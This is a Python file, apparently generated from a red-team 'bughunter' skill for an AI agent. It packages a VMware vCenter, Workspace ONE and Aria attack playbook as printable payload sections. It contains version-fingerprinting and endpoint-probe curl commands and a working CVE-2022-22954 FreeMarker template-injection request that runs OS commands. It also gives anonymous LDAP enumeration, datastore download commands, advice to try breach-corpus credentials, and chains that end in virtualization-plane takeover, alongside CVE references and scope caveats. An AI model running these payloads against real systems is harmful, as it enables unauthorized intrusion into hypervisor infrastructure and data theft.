#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/vmware-vcenter-attack

Skill: Build info endpoint (often public; revealing exact patch level)
Desc : VMware vSphere / vCenter Server external attack matrix — version fingerprinting, the high-impact CVE chain (CVE-2021-21972 vRealize unauth file upload, CVE-2021-21985 vSAN plugin RCE, CVE-2022-22954 Workspace ONE SSTI, CVE-2023-20887 Aria RCE, CVE-2024-37085 ESXi AD bypass, CVE-2023-34048 vCenter DCERPC OOB write APT-exploited), default credentials, SSO configuration disclosure, vmdir LDAP enumeration, ESXi Open SLP RCE history. ONLY for vCenter / Workspace ONE / Aria instances exposed to the internet — internal-network vCenter is out of scope per the external-only boundary. Use when recon shows port 443 with vCenter banner, `/ui` redirect, `/websso/SAML2/Metadata`, or VMware product fingerprints.

Run:  python claude-bughunter-vmware-vcenter-attack.py --help
      python claude-bughunter-vmware-vcenter-attack.py --list
      python claude-bughunter-vmware-vcenter-attack.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/vmware-vcenter-attack'
TITLE = 'Build info endpoint (often public; revealing exact patch level)'
DESCRIPTION = 'VMware vSphere / vCenter Server external attack matrix — version fingerprinting, the high-impact CVE chain (CVE-2021-21972 vRealize unauth file upload, CVE-2021-21985 vSAN plugin RCE, CVE-2022-22954 Workspace ONE SSTI, CVE-2023-20887 Aria RCE, CVE-2024-37085 ESXi AD bypass, CVE-2023-34048 vCenter DCERPC OOB write APT-exploited), default credentials, SSO configuration disclosure, vmdir LDAP enumeration, ESXi Open SLP RCE history. ONLY for vCenter / Workspace ONE / Aria instances exposed to the internet — internal-network vCenter is out of scope per the external-only boundary. Use when recon shows port 443 with vCenter banner, `/ui` redirect, `/websso/SAML2/Metadata`, or VMware product fingerprints.'

PAYLOADS = {
    'main': ["name: vmware-vcenter-attack", "description: VMware vSphere / vCenter Server external attack matrix \u2014 version fingerprinting, the high-impact CVE chain (CVE-2021-21972 vRealize unauth file upload, CVE-2021-21985 vSAN plugin RCE, CVE-2022-22954 Workspace ONE SSTI, CVE-2023-20887 Aria RCE, CVE-2024-37085 ESXi AD bypass, CVE-2023-34048 vCenter DCERPC OOB write APT-exploited), default credentials, SSO configuration disclosure, vmdir LDAP enumeration, ESXi Open SLP RCE history. ONLY for vCenter / Workspace ONE / Aria instances exposed to the internet \u2014 internal-network vCenter is out of scope per the external-only boundary. Use when recon shows port 443 with vCenter banner, `/ui` redirect, `/websso/SAML2/Metadata`, or VMware product fingerprints.", "sources: vmware-security-advisories, public-cve-databases, redteam-knowledge, disclosed-cves, cisa-kev, mandiant-zdi-writeups", "report_count: 10"],
    'when-to-use': ["Trigger when external recon shows ANY of:", "- Banner: \"VMware vCenter Server\", \"VMware vSphere Client\"", "- URL paths: `/ui`, `/ui/login`, `/websso/SAML2/Metadata`, `/sdk`, `/mob` (Managed Object Browser)", "- TLS cert SAN includes `vcenter` / `vsphere` / `vcsa` / `psc` / `vmware`", "- Workspace ONE Access / Identity Manager: `/SAAS`, `/SAAS/auth`, `/SAAS/login`, `/SAAS/horizon`", "- VMware Aria / vRealize: `/vco`, `/vco-controlcenter`, `/orchestrator`, `/lcm/api/v1`", "- Horizon View: `/portal`, `/admin`", "Do NOT use for:", "- Internal-network vCenter (out of scope \u2014 external boundary discipline)", "- Pure ESXi hypervisor exposed without management plane (rare on internet; flag as separate finding)"],
    'step-1-version-fingerprinting': ["```bash", "TARGET=\"vcenter.target.com\""],
    'build-info-endpoint-often-public-revealing-exact-patch-level': ["curl -sk \"https://$TARGET/sdk/vimServiceVersions.xml\""],
    'ui-build-visible-in-page-source': ["curl -sk \"https://$TARGET/ui/login\" | grep -oE 'build[^\"]{0,40}'", "curl -sk \"https://$TARGET/ui/\" | grep -oE 'vsphere[^\"]{0,40}'"],
    'rest-api-version-vsphere-7': ["curl -sk \"https://$TARGET/api/appliance/system/version\""],
    'cert-metadata': ["echo | openssl s_client -connect \"$TARGET:443\" -servername \"$TARGET\" 2>/dev/null | openssl x509 -noout -text | grep -A1 \"Subject Alt\""],
    'sso-admin-service-info-disclosure': ["curl -sk \"https://$TARGET/sso-adminserver/sdk/vsphere.local\"", "curl -sk \"https://$TARGET/websso/SAML2/Metadata/vsphere.local\"", "Map build \u2192 version \u2192 CVE applicability via VMware advisories (vmware.com/security/advisories)."],
    'step-2-cve-matrix-external-exploitable-sorted-by-historical-impact': [],
    'step-3-cve-2021-21972-probe-still-common-on-stale-appliances': ["```bash"],
    'detection-only-do-not-execute-the-file-upload-without-explicit-scope-ok': ["curl -sk -o /dev/null -w \"%{http_code}\\n\" \\", "\"https://$TARGET/ui/vropspluginui/rest/services/uploadova\""],
    '405-endpoint-exists-version-vulnerable': [],
    '404-patched-endpoint-removed': [],
    '401-patched-auth-required': ["curl -sk -o /dev/null -w \"%{http_code}\\n\" \\", "\"https://$TARGET/ui/vropspluginui/rest/services/getstatus\"", "Public PoC by Mikhail Klyuchnikov exists; do not execute against client infra without explicit RCE-attempt sign-off."],
    'step-4-cve-2022-22954-workspace-one-ssti-probe': ["```bash"],
    'stage-a-detection-only-reachability-baseline-no-command-execution-yet': ["curl -sk -o /tmp/wone_baseline.txt -w \"%{http_code}\\n\" \\", "\"https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=probe\""],
    '4xx-with-freemarker-catalog-portal-error-template-endpoint-present-candidate-vulnerable': [],
    '404-patched-removed-keep-the-baseline-body-to-diff-against-stage-b': [],
    'stage-b-execution-only-with-explicit-rce-attempt-sign-off-emit-a-unique-canary': [],
    'so-a-coincidental-waf-error-page-containing-uid-cannot-be-mistaken-for-real-output': ["CANARY=\"VCTR$(head -c8 /dev/urandom | od -An -tx1 | tr -d ' \\n')\"", "curl -sk \"https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=\\${\\\"freemarker.template.utility.Execution\\\"?new()(\\\"echo ${CANARY}; id\\\")}\""],
    'confirmed-rce-only-if-the-response-contains-the-exact-canary-echoed-back-and-uid-output': [],
    'that-is-absent-from-tmp-wone-baseline-txt-in-band-command-output-body-diff-against-baseline': ["Confirmed RCE requires the unique `$CANARY` reflected in-band plus `uid=` output not present in the Stage-A baseline \u2192 critical. Stop and report. A bare `uid=` with no canary echo is NOT confirmation."],
    'step-5-default-credentials-frequently-still-valid-on-lab-staging-vcenters': ["\u26a0 **Do not spray vCenter \u2014 `administrator@vsphere.local` has VERY low lockout threshold** (often 3 attempts \u2192 60s lockout, configurable to permanent). One attempt with high-confidence guess only. Use creds discovered in breach corpora."],
    'step-6-sso-vmdir-ldap-enumeration': ["```bash"],
    'sso-admin-endpoint-frequently-exposes-domain-info': ["curl -sk \"https://$TARGET/websso/SAML2/Metadata/vsphere.local\" | xmllint --format -"],
    'extract-identity-source-info': ["curl -sk \"https://$TARGET/sso-adminserver/sdk/vsphere.local\""],
    'try-anonymous-ldap-bind-to-vmdir-port-389-636-if-exposed': ["ldapsearch -x -H \"ldap://$TARGET:389\" -b \"\" -s base", "ldapsearch -x -H \"ldap://$TARGET:389\" -b \"cn=Configuration,cn=vmware,cn=cis,dc=vsphere,dc=local\""],
    'step-7-managed-object-browser-mob-frequently-leaks-data': ["```bash", "curl -skI \"https://$TARGET/mob\""],
    '401-auth-required-good-for-the-defender': [],
    '200-mob-exposed-can-browse-vms-hosts-datastores-sessions-without-credentials-in-some-misconfigs': [],
    'auth-d-mob-lets-you-walk-the-entire-vsphere-tree': ["curl -sk -u 'administrator@vsphere.local:<pw>' \"https://$TARGET/mob/?moid=ServiceInstance&doPath=content\""],
    'step-8-vsphere-rest-api-enumeration-post-cred': ["```bash"],
    'get-session-token': ["curl -sk -X POST -u 'user@vsphere.local:<pw>' \"https://$TARGET/api/session\""],
    'returns-session-token': [],
    'list-vms': ["curl -sk -H \"vmware-api-session-id: <token>\" \"https://$TARGET/api/vcenter/vm\""],
    'list-hosts': ["curl -sk -H \"vmware-api-session-id: <token>\" \"https://$TARGET/api/vcenter/host\""],
    'list-datastores': ["curl -sk -H \"vmware-api-session-id: <token>\" \"https://$TARGET/api/vcenter/datastore\""],
    'datastore-file-download-huge-vmdk-files-snapshots-credentials-in-cloud-init': [],
    'folder-path-dsname-ds-dcpath-dc': ["curl -sk -H \"vmware-api-session-id: <token>\" \"https://$TARGET/folder?dsName=datastore1&dcPath=Datacenter\""],
    'step-9-workspace-one-access-specific-paths': ["```bash"],
    'metadata': ["curl -sk \"https://$TARGET/SAAS/auth/saml/response\"", "curl -sk \"https://$TARGET/SAAS/auth/wsfed/services/idp\"", "curl -sk \"https://$TARGET/SAAS/jersey/manager/api/health\"", "curl -sk \"https://$TARGET/catalog-portal/services/airwatch/identifiers\""],
    'login-page': ["curl -sk \"https://$TARGET/SAAS/login/0\""],
    'step-10-aria-vrealize-specific-paths': ["```bash"],
    'vrealize-operations-manager': ["curl -sk \"https://$TARGET/suite-api/api/versions\"", "curl -sk \"https://$TARGET/casa/nodes/thumbprints\""],
    'aria-automation': ["curl -sk \"https://$TARGET/csp/gateway/am/api/about\"", "curl -sk \"https://$TARGET/cluster-administration/api/health\""],
    'vrealize-orchestrator': ["curl -sk \"https://$TARGET/vco/api/about\"", "curl -sk \"https://$TARGET/vco-controlcenter/api/health\""],
    'tooling': ["- **`vCenter-Exploit` collection** (multiple PoCs on GitHub for 21972, 21985, 22005)", "- **`Greenbone/openvas-scanner` VMware NASL plugins** \u2014 version detection", "- **`nuclei`** templates: `vmware-vcenter-*.yaml`, `cve-2021-21972.yaml`, `cve-2022-22954.yaml`", "- **`Metasploit`** modules: `exploit/multi/http/vmware_vcenter_*`"],
    'detection-patterns-what-defenders-soc-will-see': ["- Excessive 404s on `/ui/vropspluginui/*` \u2014 IDS signature", "- POST to `/sdk` from non-management IP", "- `administrator@vsphere.local` auth failures", "- TLS handshake fingerprint changes", "- Plugin upload to vRealize endpoint", "Pair with `mid-engagement-ir-detection` skill \u2014 vCenter is monitored heavily in mature SOCs."],
    'external-only-boundary-check': ["If recon reveals vCenter only via VPN (not direct internet) \u2192 STOP. That is internal infrastructure and outside the external-only AI scope per `feedback_skill_boundaries`. The user handles internal vCenter work directly.", "Internet-exposed vCenter is unfortunately common on the perimeter \u2014 and frequently outdated by years. The 2021-21972 / 21985 / 22954 trifecta still pays in 2026 because patching cycles for hypervisor management are slow and vendor-managed."],
    'severity-scoring-guidance-red-team-deliverable-context': [],
    'anti-patterns': ["- **DO NOT spray vCenter SSO** \u2014 lockout is aggressive; one chance often", "- **DO NOT execute file-upload PoCs without explicit OK** \u2014 they create persistent webshells; cleanup overhead and audit trail", "- **DO NOT confuse ESXi-management-on-internet with vCenter** \u2014 different attack surfaces; ESXi Open SLP CVEs target port 427", "- **DO NOT skip SSL handshake banner check** \u2014 VMware exposes versions there; this is the lowest-noise initial probe"],
    'bridge-to-neighboring-skills': ["- `enterprise-vpn-attack` \u2014 vCenter is frequently the post-VPN target; if VPN is breached, vCenter is the natural next pivot (but internal \u2014 defer to user)", "- `m365-entra-attack` \u2014 vCenter SSO sometimes federated to Entra; cred-chain bridging", "- `mid-engagement-ir-detection` \u2014 vCenter monitoring is sensitive; expect mid-engagement mitigations", "- `redteam-report-template` \u2014 vCenter findings need clear blast-radius framing (this is the virtualization plane, not just an app)"],
    'related-skills-chains': ["- **`hunt-saml`** \u2014 vCenter Workspace ONE / VMware Identity Manager publishes SAML SP metadata at `/SAAS/API/1.0/GET/metadata/idp.xml` and consumes assertions at predictable ACS URLs. Chain primitive: vCenter SAML SP metadata reachable \u2192 IdP fingerprinted \u2192 `hunt-saml` XSW1-XSW8 against the federating IdP \u2192 forged assertion with `userPrincipalName=administrator@vsphere.local` \u2192 SP-impersonation as vCenter admin \u2192 full virtualization-plane takeover.", "- **`hunt-rce`** \u2014 VMware's high-impact CVE catalog (CVE-2021-21972, CVE-2021-21985, CVE-2022-22954, CVE-2023-20887) is almost entirely pre-auth RCE. Chain primitive: vCenter version fingerprint via SSL banner or `/ui/login` body \u2192 confirm patch level missing \u2192 `hunt-rce` deserialization/SSTI gadget from the matching CVE PoC \u2192 `root` on vCenter appliance \u2192 API-token mint \u2192 cluster-wide VM control.", "- **`enterprise-vpn-attack`** \u2014 VPN compromise + vCenter on internal-only is a natural post-VPN pivot, but external-only engagement scope sometimes forbids it. Chain primitive: VPN appliance CVE \u2192 foothold inside corp network \u2192 if scope permits, `vmware-vcenter-attack` becomes reachable on internal-only vCenter \u2192 datacenter takeover.", "- **`m365-entra-attack`** \u2014 Some VMware deployments federate vCenter SSO to Entra. Chain primitive: vCenter SSO discovery \u2192 AuthURL points to `login.microsoftonline.com` \u2192 `m365-entra-attack` Entra ATO on `administrator@vsphere.local` synced identity \u2192 SAML assertion \u2192 vCenter admin without ever brute-forcing vCenter SSO.", "- **`mid-engagement-ir-detection`** \u2014 VMware vSAN/vCenter alerting is sensitive; expect SOC to patch or block within hours of detection. Chain primitive: confirmed vCenter CVE \u2192 run `mid-engagement-ir-detection` baseline capture BEFORE attempting exploitation \u2192 if response patterns change mid-test, capture the SOC-patched state as a SECOND finding (defensive-action observed). Package both via `redteam-report-template`."],
    'disclosed-cves-coordinated-disclosure-citations': ["These are the load-bearing public references for every CVE called out in the matrix above. Every entry includes the vendor advisory, the originating researcher writeup or KEV-catalog entry, and (where public) in-the-wild exploitation references."],
    '1-cve-2021-21972-vcenter-vropspluginui-unauthenticated-arbitrary-file-upload-canonical-pre-auth-rce': ["- **Affected:** vCenter Server 6.5 < 6.5 U3n, 6.7 < 6.7 U3l, 7.0 < 7.0 U1c (vRealize Operations vCenter plugin bundled with every default install \u2014 Linux or Windows variant matters for payload). VMware Cloud Foundation 3.x/4.x also bundles.", "- **Attack flow:** Unauth POST to `/ui/vropspluginui/rest/services/uploadova` with a tar/OVA containing a path-traversal entry. On Windows write `webshell.jsp` under the vsphere-ui webroot for SYSTEM; on Linux drop `authorized_keys` under `/home/vsphere-ui/.ssh/` and SSH in.", "- **Root cause:** Endpoint exposed by the vRealize Operations plugin lacked any authentication filter; the `uploadova` handler did not sanitize archive entry paths.", "- **Disclosure:** Reported by Mikhail Klyuchnikov (Positive Technologies / PT SWARM) in autumn 2020; advisory + patch published 2021-02-23 as VMSA-2021-0002; PoC on GitHub the next day triggered mass scanning. **CISA KEV:** added 2021-11-03. Year discovered 2020, patched 2021.", "- **References:** https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23599 ; https://swarm.ptsecurity.com/unauth-rce-vmware/ ; https://www.tenable.com/blog/cve-2021-21972-vmware-vcenter-server-remote-code-execution-vulnerability ; https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972"],
    '2-cve-2021-21985-vcenter-vsan-health-check-plug-in-pre-auth-rce': ["- **Affected:** vCenter Server 6.5 < 6.5 U3p, 6.7 < 6.7 U3n, 7.0 < 7.0 U2b (vSAN Health Check plugin is enabled by default whether or not vSAN is in use).", "- **Attack flow:** Unauthenticated abuse of `ProxygenController` in the vSAN Health plugin \u2192 Java unsafe reflection chained with an SSRF primitive \u2192 arbitrary method invocation as `vsphere-ui` \u2192 command execution.", "- **Root cause:** Missing input validation + dangerous reflection sink reachable from an unauthenticated REST surface.", "- **Disclosure:** Reported by Ricter Z (Yang Hao) of 360 Noah Lab; advisory VMSA-2021-0010 published 2021-05-25. Public PoC and Metasploit module followed within days; honeypots saw active exploitation. Year discovered 2021, patched 2021.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2021-0010.html ; https://noahblog.360.cn/vcenter-server-rce/ (Ricter Z writeup) ; https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce/ ; https://www.bleepingcomputer.com/news/security/vmware-warns-of-critical-bug-affecting-all-vcenter-server-installs/"],
    '3-cve-2021-22005-vcenter-analytics-service-arbitrary-file-upload-rce': ["- **Affected:** vCenter Server 6.7 < 6.7 U3o, 7.0 < 7.0 U2d. Cloud Foundation 3.x/4.x bundled vCenter.", "- **Attack flow:** Unauth POST to the Analytics endpoint on port 443 (`/analytics/telemetry/ph/api/hyper/send`) writes attacker-controlled file outside the intended directory; chained with subsequent service abuse to reach RCE as the vCenter service account.", "- **Root cause:** Analytics/CEIP endpoint did not authenticate file uploads and did not validate target path.", "- **Disclosure:** VMware advisory VMSA-2021-0020 published 2021-09-21. Working PoC by @testanull / @wvu released within ~72h; CISA issued an emergency alert 2021-09-24. **CISA KEV:** added 2021-11-03. Year discovered 2021, patched 2021.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2021-0020.html ; https://www.cisa.gov/news-events/alerts/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active-exploit ; https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/ ; https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/"],
    '4-cve-2022-22954-workspace-one-access-identity-manager-freemarker-ssti-rce': ["- **Affected:** Workspace ONE Access 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0; Identity Manager 3.3.3 \u2192 3.3.6; vRealize Automation 7.6.", "- **Attack flow:** Unauth GET to `/catalog-portal/ui/oauth/verify?deviceUdid=${...}` injects a FreeMarker template; `freemarker.template.utility.Execute` runs OS commands as the `horizon` service account. Single-request RCE.", "- **Root cause:** Catalog-portal endpoint passed attacker-controlled query parameter into FreeMarker render without sandboxing the Execute utility.", "- **Disclosure:** Reported by Steven Seeley (mr_me) of Source Incite; VMware advisory VMSA-2022-0011 published 2022-04-06. PoCs public within 48h; widespread mass-exploitation followed. **CISA KEV:** added 2022-04-14. CISA AA22-138B (May 2022) documents IR engagements at \"large organizations\" exploited via this CVE. Year discovered 2022, patched 2022.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2022-0011.html ; https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b ; https://srcincite.io/blog/2022/04/19/cve-2022-22954-vmware-workspace-one-access-pre-auth-rce.html ; https://www.crowdsec.net/blog/new-surge-in-vmware-cve-2022-22954-exploit-attempts"],
    '5-cve-2022-22972-workspace-one-access-identity-manager-vrealize-automation-host-header-authentication-bypass': ["- **Affected:** Workspace ONE Access 21.08.0.1; Identity Manager 3.3.3\u20133.3.6; vRealize Automation 7.6 (and downstream Cloud Foundation bundles).", "- **Attack flow:** Manipulate the HTTP `Host` header during local-domain login flow; the server routes its internal validation request to the attacker-controlled hostname \u2192 returns admin session without legitimate credentials.", "- **Root cause:** Host header used unvalidated as the target for the internal auth-validation request \u2014 classic SSRF-into-self with trust elevation.", "- **Disclosure:** Reported by Bruno L\u00f3pez of Innotec Security; VMware advisory VMSA-2022-0014 published 2022-05-18. **CISA Emergency Directive 22-03** (2022-05-18) ordered all U.S. federal civilian agencies to patch or remove affected VMware installations by 2022-05-24 \u2014 the same agencies that had just been told the same thing for CVE-2022-22954 six weeks earlier. Year discovered 2022, patched 2022.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2022-0014.html ; https://www.cisa.gov/news-events/directives/ed-22-03-mitigate-vmware-vulnerabilities ; https://www.rapid7.com/blog/post/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/ ; https://www.assetnote.io/resources/research/understanding-cve-2022-22972-vmware-workspace-one-access-auth-bypass"],
    '6-cve-2023-20887-vmware-aria-operations-for-networks-vrealize-network-insight-pre-auth-command-injection-rce': ["- **Affected:** Aria Operations for Networks (formerly vRealize Network Insight / vRNI) 6.2 through 6.10.", "- **Attack flow:** Two-issue chain \u2014 (a) reach the Apache Thrift endpoint exposed on the management interface despite no authentication, (b) inject shell metacharacters into a parameter passed to a `bash -c` invocation. Single unauth POST \u2192 root.", "- **Root cause:** Thrift RPC endpoint exposed without auth + downstream shell-string composition with user input.", "- **Disclosure:** Reported by Sina Kheirkhah (@SinSinology) of Summoning Team to ZDI; advisory VMSA-2023-0012 published 2023-06-07. Public PoC released same week. **CISA KEV:** added 2023-06-22 after observed in-the-wild exploitation. Year discovered 2023, patched 2023.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2023-0012.html ; https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ ; https://blogs.juniper.net/en-us/threat-research/cve-2023-20887-vmware-aria-operations-for-networks-unauthenticated-remote-code-execution ; https://github.com/sinsinology/CVE-2023-20887"],
    '7-cve-2023-34048-vcenter-server-dcerpc-pre-auth-out-of-bounds-write-rce-apt-exploited-zero-day': ["- **Affected:** vCenter Server 7.0 < 7.0 U3o, 8.0 < 8.0 U1d/U2b; VMware Cloud Foundation bundles.", "- **Attack flow:** Unauthenticated network actor sends a crafted DCE/RPC packet to the vmdir/vmafd service \u2192 out-of-bounds write in the DCE/RPC protocol implementation \u2192 memory corruption \u2192 code execution. Forensic tell: `vmdird` crashes shortly before backdoor deployment.", "- **Root cause:** OOB write in DCE/RPC marshalling layer of vCenter management services.", "- **Disclosure:** Reported by Grigory Dorodnov of Trend Micro ZDI (publication ZDI-23-1623, suggesting a paid ZDI submission \u2014 bounty undisclosed). Advisory VMSA-2023-23 published 2023-10-24. **Mandiant** later attributed in-the-wild exploitation to **UNC3886** (China-nexus espionage) since late 2021 \u2014 a ~1.5-year zero-day window before patch. **CISA KEV:** added 2024-01-22. Year discovered 2023 (patched), exploited since 2021.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2023-0023.html ; https://www.zerodayinitiative.com/advisories/ZDI-23-1623/ ; https://cloud.google.com/blog/topics/threat-intelligence/chinese-vmware-exploitation-since-2021/ (Mandiant) ; https://www.bleepingcomputer.com/news/security/chinese-hackers-exploit-vmware-bug-as-zero-day-for-two-years/"],
    '8-cve-2024-37085-esxi-active-directory-integration-esx-admins-auth-bypass-ransomware-favorite': ["- **Affected:** ESXi 7.0 < ESXi70U3q-24585291, ESXi 8.0 < ESXi80U3-24022510; vCenter-managed clusters where ESXi is joined to AD.", "- **Attack flow:** Attacker with sufficient AD rights creates (or re-creates after deletion) a group literally named `ESX Admins` and adds an account. ESXi auto-grants every member full admin rights without checking that the group existed at join time. End-to-end: AD foothold \u2192 group create \u2192 SSH/API root on every domain-joined ESXi host \u2192 mass VM encryption.", "- **Root cause:** Hard-coded trust of group name `ESX Admins` with no domain-scoped identity validation.", "- **Disclosure:** Reported by Microsoft Threat Intelligence; advisory VMSA-2024-0013 published 2024-06-25. **Microsoft Security Blog** documents pre-patch exploitation by **Storm-0506 (Black Basta), Storm-1175, Octo Tempest, and Manatee Tempest** ransomware operators \u2014 including a confirmed Black Basta deployment at a North American engineering firm. **CISA KEV:** added 2024-07-30. Year discovered 2024 (exploited as 0-day), patched 2024.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2024-0013.html ; https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ ; https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/ ; https://thehackernews.com/2024/07/vmware-esxi-flaw-exploited-by.html"],
    '9-cve-2024-22273-esxi-workstation-fusion-vcenter-storage-controller-oob-read-write': ["- **Note on the original ticket:** This CVE was listed in the brief as \"Aria SSRF,\" but the actual NVD record describes an **ESXi/vCenter storage controller out-of-bounds read/write**, not an Aria SSRF. The closest Aria SSRF-adjacent issue in the 2024 cycle is **CVE-2023-34063** (VMSA-2024-0001) \u2014 Aria Automation missing access control allowing authenticated cross-org access; CVSSv3 9.9. Both are cited so the matrix is technically accurate.", "- **Affected (CVE-2024-22273):** ESXi 7.0/8.0, Workstation 17.x, Fusion 13.x. vCenter Server packaged variants. Requires VM-local access with storage controllers enabled.", "- **Attack flow:** VM with storage controllers enabled can issue crafted I/O to trigger OOB read/write on the host \u2192 information disclosure or DoS of the host (escape not directly demonstrated). CVSS 8.1 (Important).", "- **Root cause:** Missing bounds check in the storage controller emulation path.", "- **Disclosure:** Reported by Hao Zheng (@zhz) and Jiaqing Huang (@s0duku) of TianGong Team, Legendsec @ Qi'anxin Group. Advisory VMSA-2024-0011 published 2024-05-21. Year discovered 2024, patched 2024.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2024-0011.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-22273 ; https://www.rapid7.com/db/vulnerabilities/vmsa-2024-0011-cve-2024-22273/", "- **Aria-specific companion \u2014 CVE-2023-34063 (VMSA-2024-0001):** Aria Automation 8.11.x\u20138.14.x missing access control \u2014 authenticated actor obtains unauthorized cross-organization access to remote workflows. CVSSv3 9.9. Patched in Aria Automation 8.16. References: https://www.vmware.com/security/advisories/VMSA-2024-0001.html ; https://www.cisa.gov/news-events/alerts/2024/01/17/vmware-releases-security-advisory-aria-automation"],
    '10-cve-2020-3992-cve-2021-21974-esxi-openslp-pre-auth-use-after-free-heap-overflow-esxiargs-ransomware-vector': ["- **Affected:** ESXi 6.5, 6.7, 7.0 prior to the OpenSLP patches (ESXi70U1c-17325551 / ESXi670-202102401-SG / ESXi650-202102101-SG). OpenSLP service on TCP/427.", "- **Attack flow:** Unauth attacker sends a crafted SLP packet to port 427 \u2192 memory corruption in the SLP daemon \u2192 code execution as root on the hypervisor. CVE-2020-3992 is the use-after-free (VMSA-2020-0023); CVE-2021-21974 is the heap-overflow variant (VMSA-2021-0002, same release wave as 21972).", "- **Root cause:** OpenSLP daemon \u2014 long-deprecated, exposed by default until 2021 \u2014 has unsafe parsing of SLP message frames.", "- **Disclosure:** CVE-2020-3992 reported by Lucas Leong of Trend Micro ZDI (ZDI-20-1376, paid ZDI submission). CVE-2021-21974 reported by Lucas Leong of Trend Micro ZDI as well. **CISA KEV:** CVE-2020-3992 added 2021-11-03; CVE-2021-21974 added 2023-02-08. **ESXiArgs ransomware campaign** (Feb 2023) hit ~3,800 internet-exposed hosts via CVE-2021-21974 \u2014 two years after patch was available. VMware disabled SLP by default in subsequent releases. Year discovered 2020/2021, patched 2020/2021, mass-exploited 2023.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2020-0023.html ; https://www.vmware.com/security/advisories/VMSA-2021-0002.html ; https://www.zerodayinitiative.com/advisories/ZDI-20-1376/ ; https://www.cisa.gov/known-exploited-vulnerabilities-catalog ; https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/ ; https://www.recordedfuture.com/blog/esxiargs-ransomware-targets-vmware-esxi-openslp-servers"],
    'bonus-cve-2022-31656-workspace-one-access-identity-manager-vrealize-automation-auth-bypass-post-22972-follow-up': ["- **Affected:** Same product matrix as 22954/22972. Workspace ONE Access 21.08.x; Identity Manager 3.3.3\u20133.3.6; vRealize Automation 7.6.", "- **Attack flow:** Network-only actor obtains admin without authenticating; chained with CVE-2022-31659 (auth'd RCE) the pair yields pre-auth admin RCE \u2014 the spiritual successor to the 22954+22972 pair.", "- **Root cause:** Local-domain auth flow trusted a parameter that could be supplied without prior auth.", "- **Disclosure:** Reported by **PetrusViet** of VNG Security; advisory VMSA-2022-0021 published 2022-08-02. PetrusViet released chain writeup + PoC. Year 2022.", "- **References:** https://www.vmware.com/security/advisories/VMSA-2022-0021.html ; https://www.greynoise.io/blog/vmware-workspace-one-vulnerabilities-cve-2022-31656-and-cve-2022-31659 ; https://attackerkb.com/topics/RuMGC8Q1pE/cve-2022-31656"],
    'key-meta-references-cross-cve': ["- **CISA KEV catalog (VMware filter):** https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=vmware \u2014 VMware is one of the most-represented vendors; cross-check any vCenter/ESXi/Workspace finding here before grading severity.", "- **Broadcom (formerly VMware) advisories index:** https://support.broadcom.com/security-advisories (legacy https://www.vmware.com/security/advisories.html). Search by VMSA-YYYY-NNNN.", "- **ZDI published advisories:** https://www.zerodayinitiative.com/advisories/published/ \u2014 filter \"VMware\" for the canonical paid-bounty disclosures (CVE-2020-3992, CVE-2023-34048, multiple Aria Operations and vRNI).", "- **Mandiant UNC3886 reporting:** Google Cloud Threat Intelligence has the deepest published forensic trail on long-tail vCenter zero-day exploitation. Pair with the `mid-engagement-ir-detection` skill when working a target where vCenter is reachable.", "The pattern across every entry above: **VMware management-plane CVEs are pre-auth, network-reachable, and mass-exploited within days of patch.** When external recon surfaces any of these products at a current-minus-one patch level, that is a Critical finding worth a same-day callout in the deliverable \u2014 not a Medium info-disclosure."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()